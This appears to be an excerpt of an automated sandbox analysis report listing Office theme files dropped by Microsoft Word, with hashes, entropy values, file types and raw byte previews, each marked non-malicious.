                                                  SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                  Malicious:false
                                                  Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):290
                                                  Entropy (8bit):3.5091498509646044
                                                  Encrypted:false
                                                  SSDEEP:6:Q+sxnxUX1MiDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyFdMymD0wbnKNAH/lMz1
                                                  MD5:23D59577F4AE6C6D1527A1B8CDB9AB19
                                                  SHA1:A345D683E54D04CC0105C4BFFCEF8C6617A0093D
                                                  SHA-256:9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C
                                                  SHA-512:B85027276B888548ECB8A2FC1DB1574C26FF3FCA7AF1F29CD5074EC3642F9EC62650E7D47462837607E11DCAE879B1F83DF4762CA94667AE70CBF78F8D455346
                                                  Malicious:false
                                                  Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.t.r.o.p.o.l.i.t.a.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):486596
                                                  Entropy (8bit):7.668294441507828
                                                  Encrypted:false
                                                  SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                  MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                  SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                  SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                  SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                  Malicious:false
                                                  Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):274
                                                  Entropy (8bit):3.535303979138867
                                                  Encrypted:false
                                                  SSDEEP:6:Q+sxnxUX3IlVARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnynG6ymD0wbnKNAH/lMz1
                                                  MD5:35AFE8D8724F3E19EB08274906926A0B
                                                  SHA1:435B528AAF746428A01F375226C5A6A04099DF75
                                                  SHA-256:97B8B2E246E4DAB15E494D2FB5F8BE3E6361A76C8B406C77902CE4DFF7AC1A35
                                                  SHA-512:ACF4F124207974CFC46A6F4EA028A38D11B5AF40E55809E5B0F6F5DABA7F6FC994D286026FAC19A0B4E2311D5E9B16B8154F8566ED786E5EF7CDBA8128FD62AF
                                                  Malicious:false
                                                  Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.i.e.w...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):523048
                                                  Entropy (8bit):7.715248170753013
                                                  Encrypted:false
                                                  SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                  MD5:C276F590BB846309A5E30ADC35C502AD
                                                  SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                  SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                  SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                  Malicious:false
                                                  Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):276
                                                  Entropy (8bit):3.5159096381406645
                                                  Encrypted:false
                                                  SSDEEP:6:Q+sxnxUXQIa3ARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygIaqymD0wbnKNAH/lMz1
                                                  MD5:71CCB69AF8DD9821F463270FB8CBB285
                                                  SHA1:8FED3EB733A74B2A57D72961F0E4CF8BCA42C851
                                                  SHA-256:8E63D7ABA97DABF9C20D2FAC6EB1665A5D3FDEAB5FA29E4750566424AE6E40B4
                                                  SHA-512:E62FC5BEAEC98C5FDD010FABDAA8D69237D31CA9A1C73F168B1C3ED90B6A9B95E613DEAD50EB8A5B71A7422942F13D6B5A299EB2353542811F2EF9DA7C3A15DC
                                                  Malicious:false
                                                  Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .F.r.a.m.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):570901
                                                  Entropy (8bit):7.674434888248144
                                                  Encrypted:false
                                                  SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                  MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                  SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                  SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                  SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                  Malicious:false
                                                  Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):282
                                                  Entropy (8bit):3.5459495297497368
                                                  Encrypted:false
                                                  SSDEEP:6:Q+sxnxUXvBAuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnypJymD0wbnKNAH/lMz1
                                                  MD5:76340C3F8A0BFCEDAB48B08C57D9B559
                                                  SHA1:E1A6672681AA6F6D525B1D17A15BF4F912C4A69B
                                                  SHA-256:78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC
                                                  SHA-512:49099F040C099A0AED88E7F19338140A65472A0F95ED99DEB5FA87587E792A2D11081D59FD6A83B7EE68C164329806511E4F1B8D673BEC9074B4FF1C09E3435D
                                                  Malicious:false
                                                  Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.i.v.i.d.e.n.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):558035
                                                  Entropy (8bit):7.696653383430889
                                                  Encrypted:false
                                                  SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                  MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                  SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                  SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                  SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                  Malicious:false
                                                  Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):276
                                                  Entropy (8bit):3.5361139545278144
                                                  Encrypted:false
                                                  SSDEEP:6:Q+sxnxUXeMWMluRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnycMlMymD0wbnKNAH/lMz1
                                                  MD5:133D126F0DE2CC4B29ECE38194983265
                                                  SHA1:D8D701298D7949BE6235493925026ED405290D43
                                                  SHA-256:08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68
                                                  SHA-512:75D7322BE8A5EF05CAA48B754036A7A6C56399F17B1401F3F501DA5F32B60C1519F2981043A773A31458C3D9E1EF230EC60C9A60CAC6D52FFE16147E2E0A9830
                                                  Malicious:false
                                                  Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.s.i.s...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):608122
                                                  Entropy (8bit):7.729143855239127
                                                  Encrypted:false
                                                  SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                  MD5:8BA551EEC497947FC39D1D48EC868B54
                                                  SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                  SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                  SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                  Malicious:false
                                                  Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):278
                                                  Entropy (8bit):3.516359852766808
                                                  Encrypted:false
                                                  SSDEEP:6:Q+sxnxUXKwRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6qymD0wbnKNAH/lMz1
                                                  MD5:960E28B1E0AB3522A8A8558C02694ECF
                                                  SHA1:8387E9FD5179A8C811CCB5878BAC305E6A166F93
                                                  SHA-256:2707FCA8CEC54DF696F19F7BCAD5F0D824A2AC01B73815DE58F3FCF0AAB3F6A0
                                                  SHA-512:89EA06BA7D18B0B1EA624BBC052F73366522C231BD3B51745B92CF056B445F9D655F9715CBDCD3B2D02596DB4CD189D91E2FE581F2A2AA2F6D814CD3B004950A
                                                  Malicious:false
                                                  Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.c.e.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):924687
                                                  Entropy (8bit):7.824849396154325
                                                  Encrypted:false
                                                  SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                  MD5:97EEC245165F2296139EF8D4D43BBB66
                                                  SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                  SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                  SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                  Malicious:false
                                                  Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):282
                                                  Entropy (8bit):3.51145753448333
                                                  Encrypted:false
                                                  SSDEEP:6:Q+sxnxUXKsWkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6svymD0wbnKNAH/lMz1
                                                  MD5:7956D2B60E2A254A07D46BCA07D0EFF0
                                                  SHA1:AF1AC8CA6FE2F521B2EE2B7ABAB612956A65B0B5
                                                  SHA-256:C92B7FD46B4553FF2A656FF5102616479F3B503341ED7A349ECCA2E12455969E
                                                  SHA-512:668F5D0EFA2F5168172E746A6C32820E3758793CFA5DB6791DE39CB706EF7123BE641A8134134E579D3E4C77A95A0F9983F90E44C0A1CF6CDE2C4E4C7AF1ECA0
                                                  Malicious:false
                                                  Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.a.l.l.a.x...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):1649585
                                                  Entropy (8bit):7.875240099125746
                                                  Encrypted:false
                                                  SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                  MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                  SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                  SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                  SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                  Malicious:false
                                                  Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):284
                                                  Entropy (8bit):3.5552837910707304
                                                  Encrypted:false
                                                  SSDEEP:6:Q+sxnxUXtLARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygymD0wbnKNAH/lMz1
                                                  MD5:5728F26DF04D174DE9BDFF51D0668E2A
                                                  SHA1:C998DF970655E4AF9C270CC85901A563CFDBCC22
                                                  SHA-256:979DAFD61C23C185830AA3D771EDDC897BEE87587251B84F61776E720ACF9840
                                                  SHA-512:491B36AC6D4749F7448B9A3A6E6465E8D97FB30F33EF5019AF65660E98F4570711EFF5FC31CBB8414AD9355029610E6F93509BC4B2FB6EA79C7CB09069DE7362
                                                  Malicious:false
                                                  Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .W.o.o.d._.T.y.p.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):966946
                                                  Entropy (8bit):7.8785200658952
                                                  Encrypted:false
                                                  SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                  MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                  SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                  SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                  SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                  Malicious:false
                                                  Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):282
                                                  Entropy (8bit):3.5323495192404475
                                                  Encrypted:false
                                                  SSDEEP:6:Q+sxnxUXhduDARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyxdumymD0wbnKNAH/lMz1
                                                  MD5:BD6B5A98CA4E6C5DBA57C5AD167EDD00
                                                  SHA1:CCFF7F635B31D12707DC0AC6D1191AB5C4760107
                                                  SHA-256:F22248FE60A55B6C7C1EB31908FAB7726813090DE887316791605714E6E3CEF7
